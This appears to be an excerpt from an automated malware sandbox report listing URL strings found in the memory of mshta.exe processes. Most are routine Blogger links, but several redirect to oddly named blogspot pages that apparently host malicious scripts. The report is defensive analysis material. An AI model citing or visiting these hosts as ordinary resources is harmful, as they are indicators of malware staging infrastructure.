Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574438188.0000021CF46CA000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.598269761.0000021CF6C4D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/
Source: mshta.exe, 00000021.00000002.556709892.0000021CF233E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/.
Source: mshta.exe, 00000006.00000003.389928116.000000000A469000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/1
Source: mshta.exe, 00000021.00000002.575578246.0000021CF474B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/:
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.284167006.000000000E037000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315918707.000000000DF11000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.402196536.000000000A2FA000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.462832097.00000290ABE2B000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385678317.000001BEED482000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573256646.000001BEEAD2D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.609912843.000001BEED35E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.604188808.000001BEED297000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.383485693.000001BEEDE14000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.383394302.000001BEEDDFE000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.385776898.000001BEED3A1000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/?tab=jj
Source: mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/?tab=jj8
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/I
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogger.g
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.389017798.000001BEEADFE000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogger.g&ec=GAZAHg
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogger.g.
Source: mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogger.gh
Source: mshta.exe, 0000001D.00000003.387672537.000001BEEAD37000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogger.gom/
Source: mshta.exe, 00000006.00000003.311624206.0000000008BB3000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.313544011.0000000008DE7000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.579813740.00000215A6273000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.596761635.000001BEED0E4000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.570960406.0000021CF45F3000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g
Source: mshta.exe, 0000001D.00000002.570273594.000001BEEAC93000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g)
Source: mshta.exe, 0000001B.00000002.562081398.00000215A3EC2000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://backbones1234511a.blogspot.com/p/ayoolaback.h
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://ghostbackbone123.blogspot.com/p/ghostbackup15
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://johonathahogyaabagebarhomeintum.blogspot.com/
Source: mshta.exe, 0000001D.00000003.352421705.000001BEEAD2C000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://startthepartyup.blogspot.com/p/backbone16.htm
Source: mshta.exe, 0000001B.00000002.575444266.00000215A6101000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.576518142.00000215A616B000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fbackbones1234511a.blogspot.com%2Fp%2Fayoo
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574033424.0000021CF46A0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fghostbackbone123.blogspot.com%2Fp%2Fghost
Source: mshta.exe, 00000006.00000003.284901391.000000000A352000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.
Source: mshta.exe, 0000000D.00000003.516075909.00000290ACF21000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Frandikhanaekminar.blogspot.com%2Fp%2Fayoo
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.559451367.000001BEE8ADF000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.388235434.000001BEEAD1F000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fstartthepartyup.blogspot.com%2Fp%2Fbackbo
Source: mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://backbones1234511a.blogspot.com/p/ayoolaback.htm
Source: mshta.exe, 00000021.00000002.556101893.0000021CF2312000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.586924021.0000021CF6679000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://ghostbackbone123.blogspot.com/p/ghostbackup15.h
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.308477743.000000000A32D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.400514867.00000000067A1000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.314926949.0000000006788000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.271994315.00000000067DE000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://johonathahogyaabagebarhomeintum.blogspot.com/p/
Source: mshta.exe, 0000001D.00000002.540418330.000001B6E5EC1000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/blogin.g?blogspotURL=https://startthepartyup.blogspot.com/p/backbone16.html%
Source: mshta.exe, 00000006.00000003.308761987.00000000067B7000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=8965474558532949541&pageID=3337584593152806955
Source: mshta.exe, 00000006.00000003.308761987.00000000067B7000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/comment-iframe.g?blogID=8965474558532949541&pageID=3337584593152806955W
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/content.g
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/content.g&
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/content.gl
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8
Source: mshta.exe, 00000021.00000002.556101893.0000021CF2312000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.540620819.00000214F0066000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=1690726786805467605&zx=1fe0aef2-8b4f-
Source: mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=7680886694920034828&zx=ad70dca0-0
Source: mshta.exe, 0000001B.00000002.559199361.00000215A3DF0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=7680886694920034828&zx=ad70dca0-0e6f-
Source: mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=8965474558532949541&zx=
Source: mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=8965474558532949541&zx=9facc617-3
Source: mshta.exe, 00000006.00000003.389899545.0000000006774000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285259818.000000000A390000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=8965474558532949541&zx=9facc617-3779-
Source: mshta.exe, 0000001D.00000002.571748112.000001BEEACFA000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0
Source: mshta.exe, 0000001D.00000002.540524758.000001B6E5ED0000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9027821174359424672&zx=2c5db057-0ce4-
Source: mshta.exe, 00000021.00000002.537342288.00000214EFFEC000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/f
Source: mshta.exe, 00000021.00000002.571480214.0000021CF4610000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.554362562.0000021CF2280000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/1690726786805467605/posts/default
Source: mshta.exe, 0000000D.00000003.507208512.00000290ACE9A000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.463266750.00000290ABE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/4778963473423104316/posts/default
Source: mshta.exe, 0000001B.00000002.560048090.00000215A3E56000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574984835.00000215A60C3000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/7680886694920034828/posts/default
Source: mshta.exe, 0000001B.00000002.559609483.00000215A3E29000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/7680886694920034828/posts/defaultd
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.429665706.00000000068D5000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.308477743.000000000A32D000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.313744696.000000000DF59000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.426367126.0000000006762000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.334926065.000000000A32E000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/8965474558532949541/posts/default
Source: mshta.exe, 0000001D.00000002.559507739.000001BEE8AEB000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/feeds/9027821174359424672/posts/default
Source: mshta.exe, 00000006.00000003.396883475.000000000684E000.00000004.00000001.sdmp, mshta.exe, 0000000D.00000003.363612560.00000290A9A6C000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.574511521.00000215A608E000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.559632238.000001BEE8B06000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.554389602.0000021CF2287000.00000004.00000001.sdmp, mshta.exe, 00000026.00000003.471301804.000002632CBA6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/adspersonalization
Source: mshta.exe, 00000006.00000003.288887677.0000000008E96000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.311624206.0000000008BB3000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.543112273.0000020DA147A000.00000004.00000020.sdmp, mshta.exe, 0000001B.00000002.579813740.00000215A6273000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.557558102.00000215A3CFF000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.570889400.000001BEEACB0000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.539674969.00000214F0045000.00000004.00000020.sdmp String found in binary or memory: https://www.blogger.com/go/blogspot-cookies
Source: mshta.exe, 00000021.00000002.570960406.0000021CF45F3000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/blogspot-cookiesfunction
Source: mshta.exe, 00000006.00000003.396240494.00000000068E6000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/blogspot-lr
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285259818.000000000A390000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz#
Source: mshta.exe, 00000006.00000003.309377820.000000000A391000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz)
Source: mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz2
Source: mshta.exe, 00000006.00000003.335402852.00000000067B2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz5
Source: mshta.exe, 00000006.00000003.309377820.000000000A391000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz6
Source: mshta.exe, 00000006.00000003.309377820.000000000A391000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/buzz?
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.389928116.000000000A469000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.576923037.000001BEEAE9D000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicy
Source: mshta.exe, 00000006.00000003.309377820.000000000A391000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicy/products?tab=jh/posts/defaultD=3337584593152806955pencil
Source: mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicy0
Source: mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicyAClC
Source: mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicyJ
Source: mshta.exe, 00000006.00000003.309050554.000000000E037000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicyPz
Source: mshta.exe, 0000001D.00000002.576923037.000001BEEAE9D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicyT
Source: mshta.exe, 0000001D.00000002.576923037.000001BEEAE9D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicy_
Source: mshta.exe, 00000006.00000003.389928116.000000000A469000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/contentpolicyt
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.309308738.000000000A35F000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devapi
Source: mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devapi)
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devapiJ
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devapiM
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devapiz
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devforum
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devforumF
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devforumU
Source: mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devforumf
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/devforumq
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/discuss
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/discussD
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.430438198.000000000A2F8000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.433660449.000000000A473000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/helpcenter
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/helpcenter)pLjf
Source: mshta.exe, 00000006.00000002.430438198.000000000A2F8000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/helpcenter4X
Source: mshta.exe, 0000001D.00000002.576923037.000001BEEAE9D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/helpcenterW
Source: mshta.exe, 0000001D.00000002.576923037.000001BEEAE9D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/helpcenterh
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.576923037.000001BEEAE9D000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/privacy
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/privacy2
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/privacyY
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/privacya
Source: mshta.exe, 0000001D.00000002.575227183.000001BEEAE20000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/privacy~
Source: mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.386990795.000001BEEAE20000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.573620913.000001BEEAD3B000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/terms
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/termszW
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.382069371.000000000A410000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.285244697.000000000A4BF000.00000004.00000001.sdmp, mshta.exe, 00000006.00000002.433660449.000000000A473000.00000004.00000001.sdmp, mshta.exe, 0000001B.00000002.542329360.0000020DA1463000.00000004.00000020.sdmp, mshta.exe, 0000001D.00000003.387444480.000001BEEAE96000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000002.598912370.000001BEED199000.00000004.00000001.sdmp, mshta.exe, 00000021.00000002.574848844.0000021CF46F2000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/tutorials
Source: mshta.exe, 00000006.00000002.430438198.000000000A2F8000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/tutorials8
Source: mshta.exe, 0000001D.00000002.576923037.000001BEEAE9D000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/go/tutorialsg
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.284394415.000000000A384000.00000004.00000001.sdmp, mshta.exe, 0000001D.00000003.388360976.000001BEED3B0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.png
Source: mshta.exe, 0000001D.00000002.574780077.000001BEEADC0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.png&v
Source: mshta.exe, 0000001D.00000003.388360976.000001BEED3B0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngC:
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngR~
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngZw
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngc~
Source: mshta.exe, 0000001D.00000002.558969425.000001BEE8A66000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngotrack.jsP)
Source: mshta.exe, 00000006.00000003.321658408.000000000A90A000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngq(
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngs
Source: mshta.exe, 0000001D.00000002.570889400.000001BEEACB0000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngssk
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.pngtice.jsst
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/blogger-logotype-color-black-1x.png~wy
Source: mshta.exe, 00000006.00000002.431863271.000000000A361000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.png
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.png/
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.png9
Source: mshta.exe, 00000006.00000003.389899545.0000000006774000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngkZ
Source: mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/img/share_buttons_20_3.pngmple/gradients_light.pngight.pngGradientType=0blog
Source: mshta.exe, 00000006.00000003.308884213.00000000067CA000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.315771821.0000000006784000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.309377820.000000000A391000.00000004.00000001.sdmp, mshta.exe, 00000006.00000003.400562039.00000000067A4000.00000004.00000001.sdmp String found in binary or memory: https://www.blogger.com/page-edit.g?blogID=8965474558532949541&pageID=3337584593152806955&from=penci
